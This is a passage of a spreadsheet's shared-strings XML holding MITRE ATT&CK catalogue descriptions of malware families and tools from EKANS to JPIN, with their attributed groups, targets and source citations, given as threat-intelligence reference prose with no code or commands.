    <t>[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)  </t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>FruitFly is designed to spy on mac users  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform  threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020) </t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t xml:space="preserve">[Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021)  </t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++  that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor--based on the Heyoka open source exfiltration tool--that  has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022) </t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017.  [IcedID](https://attack.mitre.org/software/S0483)  has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
